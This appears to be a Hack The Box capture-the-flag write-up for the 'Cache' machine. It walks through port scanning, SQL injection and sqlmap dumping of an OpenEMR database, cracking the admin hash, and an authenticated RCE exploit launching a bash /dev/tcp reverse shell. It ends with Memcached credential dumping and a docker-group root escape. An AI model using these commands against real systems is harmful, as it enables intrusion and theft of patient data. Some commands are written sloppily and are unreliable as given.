Scanning
Nmap
ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.188 | grep open | awk -F / '{print $1}' ORS=',') echo $ports && nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10.10.10.188
1
2
3
4
5
6
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
2201/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
web_server
pocking around the site in firefox using
inspect element
tool i notice a js file inlogin
page.1
functionality.js
going to
functionality.js
revels some interesting data1 2 3 4 5
... if(Password != 'H@v3_fun') ... if(Username != "ash") ...
Fuzzing
- create wordlist from website text
cewl -w wordlist http://10.10.10.188
- Using
wfuzz
tool to fuzz for sub domains or Virtual host.wfuzz -w wordlist -H "HOST:FUZZ.htb" -u http://10.10.10.188/ --hc 400
1
000000415: 302 0 L 0 W 0 Ch "HMS"
- and found Virtual Host
hms.htb
running on port 80
hms.htb
heading over to
http://hms.htb
i noticed:- url is redirected to
http://hms.htb/interface/login/login.php?site=default
- this is a login page
- login page is a instance of OpenEMR
- openEMR copyright 2018
- url is redirected to
Search : openEMR
search results
- OpenEMR is a medical practice management software which also supports Electronic Medical Records. It is ONC Complete Ambulatory EHR certified and it features fully integrated electronic medical records, practice management for a medical practice, scheduling, and electronic billing.
- 2018 openEMR releases are `5.0.1 to 5.0.1.6
search : openEMR 5.0.1 - 5.0.1.6 vulnerabilities
search results
- OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution, ExploitDB
- complete documentation on openEMR 5.0.1.3 vulnerabilities, open-emr.org doc
- reading document i found out that there is a sql injection vuln registration page vulnerabilities
User Exploiting
Tried the Authenticated RCE exploit with ash
creds but it did not worked, after SQLi it helps so i keep it.
SQLi
- An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page and modifying the requested url
Some examples of pages in the portal directory that are accessible after browsing to the registration page include:
1 2 3 4 5 6 7 8 9 10 11 12
-add_edit_event_user.php -find_appt_popup_user.php -get_allergies.php-get_amendments.php -get_lab_results.php-get_medications.php -get_patient_documents.php -get_problems.php -get_profile.php-portal_payment.php -messaging/messages.php -messaging/secure_chat.php -report/pat_ledger.php -report/portal_custom_report.php -report/portal_patient_report.php
- as document say from registration page we can modify these pages requests and access to the database using sql injection
how
- navigating to the registration page
- request for
hms.htb/portal/add_edit_event_user.php?eid=1
- sqli
eid='
through an sql error
sqlmap
- Frist, capture
hms.htb/portal/add_edit_event_user.php?eid=1
fromregistration page
in burpSuite. Second, than dump data using sqlmap tool,
1 2 3
sqlmap -r emr.req --dbs --batch sqlmap -r emr.req --dbs --batch openemr --tables sqlmap -r emr.req --dbs --batch openemr -T users_secure --dump
in the dump i found
user:hash
1 2 3 4 5 6 7 8 9
Database: openemr Table: users_secure [1 entry] +------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+ | id | salt | username | password | last_update | +------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+ | 1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | +------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+ ...[snip]...
ippsec manual sqli video
john
hash : openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B
john -w=/usr/share/wordlists/rockyou.txt hash
1
xxxxxx openemr_admin
creds
openemr_admin:xxxxxx
User Authenticated RCE
using script OpenEMR < 5.0.1 - (Authenticated) RCE
ippsec video
python openEMR-RCE.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/tun0/1337 0>&1'
- this command specified in the Exploit itself
it excute reverse shell and connect back to netcat on specified port
nc -nvlp 1337
- I got an
www-data@cache:~$
shell
enumeration www-data
/etc/passwd
reviles that there is a use ash- use ash creds to
su
to userash:H@v3_fun
- got shell as ash user
user ash have user flag
1
ash@cache:~$ cat user.txt
Local Enumeration
check network services
1 2 3
ash@cache:~$ netstat -tnlp Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN
- search for port
11211
found out that this is a Memcached server that running locally - searching about Memcache on google i endup on a hackingarticles.in blog post .
dump Memcache data
I use telnet to connect to Memcached server from ash user shell
ash@cache:~$ telnet 127.0.0.1 11211
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
Trying 127.0.0.1... Connected to 127.0.0.1. stats slabs STAT active_slabs 1 stats cachedump 1 0 ITEM user [5 b; 0 s] ITEM passwd [9 b; 0 s] get user VALUE user 0 5 luffy END get passwd VALUE passwd 0 9 0n3_p1ec3 END
creds
luffy:0n3_p1ec3
1
2
3
ash@cache:~$ su - luffy
Password: 0n3_p1ec3
luffy@cache:~$
Enumeration luffy
checking user luffy groups
1 2
luffy@cache:~$ id uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
checking if there is any running container, There are not containers currently running
1 2
luffy@cache:~$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cheacking if There is any docker image
1 2 3
luffy@cache:~$ docker image ls REPOSITORY TAG IMAGE ID CREATED SIZE ubuntu latest 2ca708c1c9cc 7 months ago 64.2MB
Root Privesc
- found docker shell at GTFO Bins
it can be used to break out from restricted environments by spawning an interactive system shell. The resulting is a root shell.
1
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
in my case cache have ubuntu docker image
1
docker run -v /:/mnt --rm -it docker chroot /mnt bash